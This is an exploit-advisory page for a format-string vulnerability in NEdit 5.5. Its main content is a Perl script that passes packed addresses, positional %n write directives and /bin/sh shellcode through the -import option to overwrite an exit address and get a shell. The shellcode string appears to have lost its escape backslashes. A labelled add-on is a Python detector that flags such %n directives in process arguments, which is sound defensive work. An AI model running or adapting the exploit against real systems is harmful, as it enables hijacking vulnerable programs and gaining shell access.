NEdit 5.5 Format String Exploit

Summary

NEdit 5.5 suffers from a format string vulnerability.

Credit:

The information has been provided by Tosh.


Details

Vulnerable Systems:
 * NEdit 5.5 Format

#!/usr/bin/perl -w

use strict;

my $exit_addr = 0x0815a86c;

my $sc =
'x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50'.
'x54x53xb0x3bx50xcdx80';

my (@payload) = ('./nedit', '-import',
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).

'%1021$.8x-'.'%1$127x%1021$n%1$083x%1022$n%1$212x%1023$n%1$256x%1024$n'
. $sc);

exec(@payload);
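
Added example, not part of the original advisory or of Tosh's script: a Python check that a defender could run over logged process arguments to flag printf-style %n write directives like those passed to -import above. The function names, verdict labels and sample command lines are assumptions made for illustration, and the samples are constructed.

```python
import re

# One printf conversion: %[N$][flags][width][.precision][length]conversion
SPEC = re.compile(
    r"%(?:(?P<pos>\d+)\$)?"            # positional selector such as 1021$
    r"[-+ #0']*"                        # flags
    r"(?:\d+|\*(?:\d+\$)?)?"            # width
    r"(?:\.(?:\d+|\*(?:\d+\$)?)?)?"     # precision
    r"(?:hh|h|ll|l|j|z|t|L)?"           # length modifier
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"  # conversion; %% is matched so it is skipped
)

def inspect_arg(arg):
    """Summarise the printf directives found in one command-line argument."""
    specs = [m for m in SPEC.finditer(arg) if m.group("conv") != "%"]
    writes = [m for m in specs if m.group("conv") == "n"]
    positions = [int(m.group("pos")) for m in specs if m.group("pos")]
    return {
        "directives": len(specs),
        "writes": len(writes),
        "positional_writes": sum(1 for m in writes if m.group("pos")),
        "max_position": max(positions, default=0),
    }

def verdict(argv):
    """Return (label, index of the offending argument) for an argument vector."""
    worst = ("clean", None)
    for i, arg in enumerate(argv[1:], start=1):
        info = inspect_arg(arg)
        if info["positional_writes"] or info["writes"] > 1:
            return ("memory-write", i)   # several or positional %n: not a filename
        if info["writes"] == 1 and worst[0] == "clean":
            worst = ("review", i)        # a lone "% n" can occur in ordinary text
    return worst

# Constructed samples. The first reuses the directive string from the script
# above, with the packed addresses and shellcode replaced by placeholder text.
SAMPLES = {
    "page_payload": ["./nedit", "-import", "AAAABBBBCCCCDDDD"
                     "%1021$.8x-%1$127x%1021$n%1$083x%1022$n%1$212x%1023$n%1$256x%1024$n"],
    "benign_file": ["./nedit", "-import", "macros-100%%-final.nm"],
    "percent_name": ["./nedit", "-import", "50% notes.nm"],
}

if __name__ == "__main__":
    for name, argv in SAMPLES.items():
        print(name, verdict(argv))
```

The "review" tier exists because a percent sign followed by a space and a word starting with "n" parses as a valid write directive, so a single non-positional hit is not treated as conclusive.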

Disclosure Timeline:
Published: 2011-04-14

Categories: Exploits